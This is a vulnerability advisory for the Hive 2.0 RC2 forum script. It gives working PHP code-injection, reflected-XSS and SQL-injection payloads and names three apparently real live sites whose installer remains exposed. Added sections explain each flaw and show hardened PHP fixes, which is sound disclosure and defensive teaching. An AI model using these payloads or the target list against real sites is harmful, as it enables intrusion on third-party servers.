packetstorm / indoushka / PACKETSTORM:132136
History: Jun 03, 2015 - 12:00 a.m.

Hive 2.0 RC2 XSS / Code Execution / SQL Injection

2015-06-03 00:00:00
indoushka
packetstormsecurity.com
| # Title : Hive v2.0 RC2 Multiple Vulnerabilities
| # Author : indoushka
| # email : [email protected]
| # Dork : "Powered by DigitalHive"
| # Tested on: Windows 8.1 Pro (French)
| # Bug : Stop Script
| # Download : http://www.digitalhive.com
=======================================  
Stop Script, working examples on live sites (note that the installer, install/install.php, is still reachable after setup):
  
monocircus.free.fr/Forum/install/install.php?var=finish  
sgdf.rodez.free.fr/forum/index.php  
espace-associatif.org/forum/install/install.php  
  
PHP code injection :  
  
Vulnerability description
This script is vulnerable to PHP code injection.

PHP code injection lets an attacker run code of their choosing in the server-side scripting engine. It occurs when the attacker controls all or part of an input string that is fed to an eval() call, or that is written into PHP source the application later includes; either path executes the input as code. The payload below relies on PHP evaluating ${expr} inside a double-quoted string, so it fires wherever the input lands in such a string that is subsequently executed.
This vulnerability affects /hive/install/install.php.
  
Attack details
URL-encoded POST input base was set to ${@print(md5(test))}
Possible execution result: 63c19a6da79816b21429e5bb262daed8
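Added example (this is not Hive's code) of the pattern behind both the reachable-installer finding and the code injection above. It assumes, as is usual for PHP installers, that install.php takes the POST field base named in the scanner output and writes it into a generated config.php as a double-quoted PHP string, and that nothing stops the installer from being run again on a live site. Because PHP evaluates ${expr} inside double-quoted strings, the advisory's payload runs the moment the generated file is included. The hardened version refuses to run once a lock file exists and stores the value with var_export() so it is written as a string literal, never as code. The config and lock file names are assumptions.

```php
<?php
// Added example, not Hive's own code. Models a typical PHP installer that
// writes a POSTed value into a generated config file. The field name 'base'
// comes from the advisory; the config file layout and file names are assumed.

// --- Vulnerable pattern: value spliced into a double-quoted PHP string ---
function build_config_vulnerable(string $base): string
{
    // The submitted value ends up between double quotes in config.php, so a
    // value such as ${@print(md5(test))} is evaluated when that file is included.
    return "<?php\n\$base = \"" . $base . "\";\n";
}

// --- Hardened pattern: value written as a PHP literal via var_export() ---
function build_config_safe(string $base): string
{
    // var_export() emits a single-quoted literal with ' and \ escaped, so the
    // generated file parses back to exactly the submitted string, as data.
    return "<?php\n\$base = " . var_export($base, true) . ";\n";
}

// Refuse to run the installer again once the site is set up. This is the
// missing check behind the still-reachable install/install.php URLs above.
function installer_allowed(string $lock_file): bool
{
    return !file_exists($lock_file);
}

// Web-facing entry point: what the installer's "finish" step should do.
function run_install(string $config_file, string $lock_file): void
{
    if (!installer_allowed($lock_file)) {
        http_response_code(403);
        exit('Site already installed; remove ' . basename($lock_file) . ' to reinstall.');
    }
    $base = (string) ($_POST['base'] ?? '');
    file_put_contents($config_file, build_config_safe($base), LOCK_EX);
    file_put_contents($lock_file, date('c'), LOCK_EX);
}

// Offline demonstration with the advisory's payload (constructed input).
// Nothing is executed here: the two functions only return the text that
// would be written to config.php. Including the vulnerable variant would
// trigger the print() call; the safe variant assigns an inert string.
$payload = '${@print(md5(test))}';
echo "--- vulnerable config.php ---\n", build_config_vulnerable($payload);
echo "--- hardened config.php ---\n", build_config_safe($payload);
```

Run from the CLI it only prints the two generated file bodies; run_install() is the path a web-facing installer would call. Removing the install/ directory after setup remains the operational fix; the lock check is the in-code backstop for sites, like the ones listed above, where that step was skipped.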
  
XSS :

http://localhost//hive/base.php?mt=1%22%20onmouseover%3dprompt%28933088%29%20bad%3d%22&page=membres.php

Decoded, mt is 1" onmouseover=prompt(933088) bad=" ; the payload assumes the value is reflected into a double-quoted HTML attribute without encoding, so the first quote closes the attribute, onmouseover becomes an event handler on the element, and bad=" absorbs the original closing quote.
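Added example (not Hive's code) of the server-side defect the URL above exercises. It assumes base.php echoes mt into a double-quoted attribute of a hidden input; the markup is a stand-in, the decoded payload is the advisory's.

```php
<?php
// Added example, not Hive's own code. Models base.php reflecting its `mt`
// query parameter into a double-quoted HTML attribute, which is the context
// the PoC's attribute-breakout payload relies on. The hidden-input markup
// is an assumption about the page.

function render_mt_vulnerable(string $mt): string
{
    // Raw interpolation: the " in the value closes the attribute and the rest
    // of the input becomes new attributes on the same element.
    return '<input type="hidden" name="mt" value="' . $mt . '">';
}

function render_mt_safe(string $mt): string
{
    // Output encoding for the attribute context. ENT_QUOTES covers both quote
    // styles; ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying output.
    $enc = htmlspecialchars($mt, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="mt" value="' . $enc . '">';
}

function read_mt_strict(array $query): int
{
    // mt is a numeric tab id in the PoC (mt=1), so the tightest fix is to
    // validate the type at the boundary and never treat it as markup at all.
    // Anything that is not an integer falls back to the default.
    return filter_var(
        $query['mt'] ?? 0,
        FILTER_VALIDATE_INT,
        ['options' => ['default' => 0]]
    );
}

// Decoded value of the PoC's mt parameter (constructed input, runs offline).
$mt = '1" onmouseover=prompt(933088) bad="';
echo "vulnerable: ", render_mt_vulnerable($mt), "\n"; // handler lands on the element
echo "encoded:    ", render_mt_safe($mt), "\n";       // quotes are entity-encoded
echo "validated:  ", read_mt_strict(['mt' => $mt]), "\n"; // non-integer is rejected
```

Encoding fixes the sink; validating mt as an integer fixes the source. For a parameter that only ever carries a tab number, do both, and apply the same attribute-context encoding to every other reflected value on the page.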
  
SQL injection :

This vulnerability affects /hive/base.php.
Attack details
URL-encoded POST input location was set to 1'"
Error message found:
supplied argument is not a valid MySQL result
This is the warning PHP's legacy mysql_fetch_*() functions raise when handed the false that mysql_query() returns for a malformed query, so the quote characters reached the SQL text unescaped and broke the statement.
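Added example (not Hive's code) showing why the probe 1'" yields that warning and what the fix looks like. It assumes base.php builds a query over a membres table by concatenating the location field into the SQL and then hands the result straight to a mysql_fetch_*() call; the table and column names are assumptions.

```php
<?php
// Added example, not Hive's own code. The advisory's error text is the
// warning the legacy mysql_fetch_*() functions emit when given the `false`
// that mysql_query() returns for a syntactically broken query, which is what
// the probe 1'" produces once it is spliced into the SQL. Table and column
// names are assumed.

// Vulnerable pattern: POST value concatenated straight into the query text.
// (The legacy mysql_* API it was used with is gone since PHP 7, so only the
// query construction is shown; the broken SQL is what triggers the warning.)
function build_query_vulnerable(string $location): string
{
    return "SELECT id, pseudo FROM membres WHERE location = '" . $location . "'";
}

// Hardened pattern: parameterised query via mysqli. The value never touches
// the SQL text, and a failure is logged rather than echoed to the client.
function find_by_location(mysqli $db, string $location): array
{
    $stmt = $db->prepare('SELECT id, pseudo FROM membres WHERE location = ?');
    if ($stmt === false) {
        // With PHP 8.1+ default mysqli error mode this throws instead; either
        // way the driver detail stays server-side.
        error_log('prepare failed: ' . $db->error);
        return [];
    }
    $stmt->bind_param('s', $location);
    $stmt->execute();
    $result = $stmt->get_result();          // needs the mysqlnd driver
    $rows = $result ? $result->fetch_all(MYSQLI_ASSOC) : [];
    $stmt->close();
    return $rows;
}

// The advisory's probe value (constructed here) and the statement it yields.
$probe = "1'\"";
echo build_query_vulnerable($probe), "\n";
// The unbalanced quotes make MySQL reject that statement. Under the legacy API
// the resulting false is passed to mysql_fetch_array(), and PHP prints the
// "supplied argument is not a valid MySQL result" warning seen on the page.

// Live usage (needs a database; the credentials are placeholders):
// $db = new mysqli('localhost', 'user', 'pass', 'hive');
// $db->set_charset('utf8mb4');
// var_dump(find_by_location($db, $probe)); // quotes are bound as data
```

Beyond the query itself, the leak is that PHP warnings reach the browser: set display_errors=Off in production and log_errors=On, so a scanner's probe no longer gets the confirming error string.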
  
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================  
Greetz :   
Exploit-db Team :   
(loneferret+Exploits+dookie2000ca)  
all my friends :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)  
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/  
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net  
---------------------------------------------------------------------------------------------------------------  